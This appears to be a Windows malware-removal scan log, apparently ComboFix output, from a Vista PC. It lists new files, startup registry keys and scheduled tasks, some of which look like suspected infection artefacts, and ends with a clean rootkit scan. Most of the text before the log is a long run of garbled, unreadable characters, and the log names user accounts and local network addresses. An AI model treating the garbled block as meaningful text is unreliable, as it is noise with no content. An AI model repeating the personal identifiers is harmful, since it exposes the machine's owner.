"Cjxs9C3wv}?O3SZ*U^09r8P\&6MDo53onIs*v5.aUlV6.N2.e]`9AUitVp.x$eF^1(xL\nhDS}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&JzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O JXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-dX12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k07rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7SH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH%\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&JzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O JXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-dX12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k07rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7SH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH%\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+SH%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SH,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb%-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH%\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&dz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7S&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,ySXR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-JXO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kR\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\dX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX0\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&JzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O JXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SH,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb%-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH%\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\F"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-1GIo]`sI]#w&]M^U( ]Gp`s25x1*KZ2Tl`N5i`s?mpNj.M9-j!"W9!BfCo^Si2&T.Zw5}`sAji9Wt!9\mM1dI`99:39U.V.}pjs9i`.&"T.aDF}VwY"jB&]iDWHsw9lAVo]`1\jTjAi3D!".B.K`s&UjaB4y1jI82TP`.x5TVK4F96C(9L5j]xPT^WH:w9lV,J}`s}]ias^MgBmFslK`q!"j\"q.\l tsi`s&Uq1Gp.g!C(9L"joAjT9x[!D}ljV$]Z}\PixAj(9]Ij[;+AFA"Vw.IA9-lZ1G[2NA5TVgI ^-t.x\5HM}p9xiM8op0.$]As&ii9x8 w/mM1Np`s&`j4tIoV3p^VK]yV&Uis;jg!}L"(53]\iixfjjDrlq,o}j9f[igxi(g35([xKVV&5D#?A.$KoAu]VV\\TY$?jwot 9yd!3!jTXA}.wF}8s%]om!jT"W#C4K5.VS.VtIUj3Ijs$p:I%}qVA`i.dMXAPjwAgM[sjh9Ye ^GIZsB}qVr}""Y 3&T:jLHI Nf5j"XmoVhSZoX\A9|qo}s?V4U}jwA5x[k\+"/e l648wpn_1H8#I! Vw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA`2"]qNBp`s$}`sA5is~pj4iV^x:C^h]T^fJ!l/l`sU}`sA}iwA}jw$5s0IsVA9xa]qNBI:Apj`1A5is~pjw$}jwA5 3h#T^f}3l!l`sUn^9}tT^A}jw$5jo~p`sAUF4jqNBK:Apj`1M:V}ap9$}jwA5joA}iwA[K^!l`sG#w9}tT^L\s9B5!o~p`sA5jw$p`s35NApj`1q:V}ap^iiV^xUjoA}iwA}jw$p`s}\89}tT^D\s9B5!a}IsVA\!w$p`s$p`s$}`sq}iwap^iV^xUK)h#T^f}jw$p`s$}`sA}iAD\M8B5!X}IsVAmxajqNBp`s$}`sA5is~pj9}iF^xUKLh#T^fi3l!l`sU}`sA}iwA}jw$5tZ?sVAmF"jqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s!C^9}tTaX\s9B5!o~p`sAUV~jqNBp`s$}`ss5is~}!w$}jwA5&Lh#T^f}jw$p`sHt^9}tT^A}jw$5K#ZIsVA\!w$p`s$?.AOj`1A5is~pjg;iF^xUjoA}iwAi&"Fl`sU}`sA}ix&\M8B5!o~p`sAUaPqNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw/?wwei0*k\s&6e39 U.so1qYk"F\/p`s$pjqz#NA.U3wyK~!CFaqU:aL\T8Aiy~ j8I.#0F1nV^Fi3j*:jo_1:Al"&4"KVFjmy9$}`sA"T5S5Lx.}.I6:(s5nV8*PM8jmy9$}^IK]p45i.\/U3aDj 1k5jw$p`}6HV1dPNALmT.~.L~dPFg.gjt}"jDe39fp`s$}0wk8sx/e Zq(M]wK V}j!lz.^tFm8s]}^1."i*:.3"][.aCCHA}iwA#V4 mwwoP Vl#TIh V\6(MHI.s6k(VxAjNfpqsp\qtlts}7534$[.aCCHA}iwAiKxG4w3z[wI3#"wr .4/9F2oj0Ntj&4dp`}/.ws }0wHmq9g.2w$}jws\Ma3]PwWe!4/4wwo Ak]q\n .1a(st2p^}.ts\Pj^jq.Z6Oi 1k5is~pjj6n.a("L$l##\FtM8d+qqzHoIl#"`hi8*9VVHmZsIj.xpjj}/?0Fjo.l"ft.pjw$}.jYj:XI\U4 eyx KwweCZsk\U4/P(aB9.2_+_1A5jw$j:qX?s9O8GAtjT}.5.4A82wC"M1A}iwA}j\UIs*fj`sAjpg&}?O$1x[xNbYl1Kg/1AsXK_V!}2IS}!NArs^+j.I6"32wCqAF}:OUI`Fe G9w6 wHnkDGI!o~p`s5(MOzNZV.I`FzijsS}isH+."+j g*IjAXep4ZjVzTrG}( _VIHo~Z}3kA:C[&}ZNn}2a1q."IZ2*PNpy9qAG?y4KjVx x(6[ 9A}jw$pjoTjAt;i/R\Jy931CoHlq9A\!w$mUYUp`s$}`s(5#.Np9$}K\I9!HA}ixC?DXIGN/iZYA8o^v6Dtg]"l`wj\3gBpjVdHUYH 05\9Ts5lCjH}3wA5V]H3&*J&99?ZI3jNA2jp~sP9(5Kt".A2!5.wJ+`.4Iwwhi`sw"PHMIf9C]kR!9fsf}fI!PXO%jVm+}`9A}igsn.A.U3t2I`sAUj&XS2N9KAt3jNAA}3tHp3^(CkR\}s$A] wZt:\2p01$}`swjf"vjjl(9ls.k`935vg/1u%*?as$}`pcuit&}fw$}jw95l3\[T4Xiy"}4s5.[A}xFT82[ `*5 ^MmZs3"M"\}A1VKVI/#063j3Y;1?R-J!w&5!X3]3wZt gVp^9$}`2 6/DZH?R*d!o~pZ9ct2jop`s/I.}*]ZqFd"tApjw$]f49`24ItpjvtXD%S8qT}N3\[T&h}FA.t!4AKAq 9F"zIAI}5^w-^y11(Tt$S&1*}jwAnyB?trDAtMI*p02-}Z6&Ho~x]f"}g2}.j`};j:931 wGIyNh[b,29Ts~}2w5}L\&`!]&n3XXjL"/rU,f}NA2 pgsP(g((!BG;%\9!w$1 N]j_IfioV?("9\I.wo}jwsIj(Dn3wZ}.w/HwoT[A5D}f\qCM"Ttso7NG3c5.~(lj5"my3a\.Iw\+W7j:\g}?rht&hw}p9:tm`.?8ihh29|ji&*j&9$`c]kn2v35k~}nvy]+`s%j_9z:it p3w+ 0yty]w\o4&Jy~e1VV/[.I?[%^M6jl3mM^.H.AfU46Sym.KqF+HH%\nfInKK4$Hsx:}K$sHu~sP(\I89h6As|tU9A}jw35L]~.0m 9&4Ol:A]+UYX As29Ts~HMj9]f"5}2]*jPws}Fw2I N(ijNw[f9*CKA"gMV.H2NxtsTTp0V}IZ9oC`w25%3X1:1.\Vx:n!aji 9Xnj"++ApTjqo\[rR\ fwq:sBslV.*I!^op`,.w5q\.Vc"us0SF&T}3wA5jos}iwA}jX/l`sU}`sA}VwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$K:!kFPD4#^;9f\H8FN&Z"-mG!ArHt8i2Vy9!.DSVxq8x"w(iEj l!t(x-mw1s^ }we+jyJ3841xHK5q6N}Lau}oI3}q6stys!\i}7m3\q8:g!m1Ei!Ow8x"smboGty2oC+jX8:jdty(!}V6/&s\2m Iq5q6}^s,!\ 1Z|?SGt 5o5Z44}U^!t.D[(U68#`VE[9tXp?X8jjs!NGHXo?X8.`V;NGHz 8FNnjbK!^;[s~!1VTwFj0wJ3^;Ns,.tUo3^/S6HLA"tkAS+GphdZ"-m;3{|wYPno1!\ !!jxj;[M^Y\?X98U"V^:OAjy.z[sVLtptEPwz1 444w!v}39sNAIs4V.UeoIV"h,HIxj;e&"w( Xp8+^E[Mjz|;tUeUAF^+jX\y&;\MakqA1t(MXplq*V42N}^s,L5j3k|M9V(2zWq!B*[!j4p.ZdZ9X[V.4p#Z/ FjB(x}.H^!/qFjB4 p"H^!d 8.9(Up.HVZ2(Z44UX!iu"Xp?02|U3;jq* 8+DVFZ"AdZ]SSGb/tZSA|:Y15ysTeytG6PY^+M^Tv#*#rin'C "EU`aQJ,kna,^+U-=lE~ZS8#I)mmYm4`b )8Im^Wdnv#iKXQpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-07-25 to 2014-08-25  )))))))))))))))))))))))))))))))
.
.
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-25 15:07 . 2014-08-25 15:07 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-25 13:55 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-25 13:35 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-25 12:26 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-25 15:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-25 14:49 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-25 13:16 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-25 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-25 11:08
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
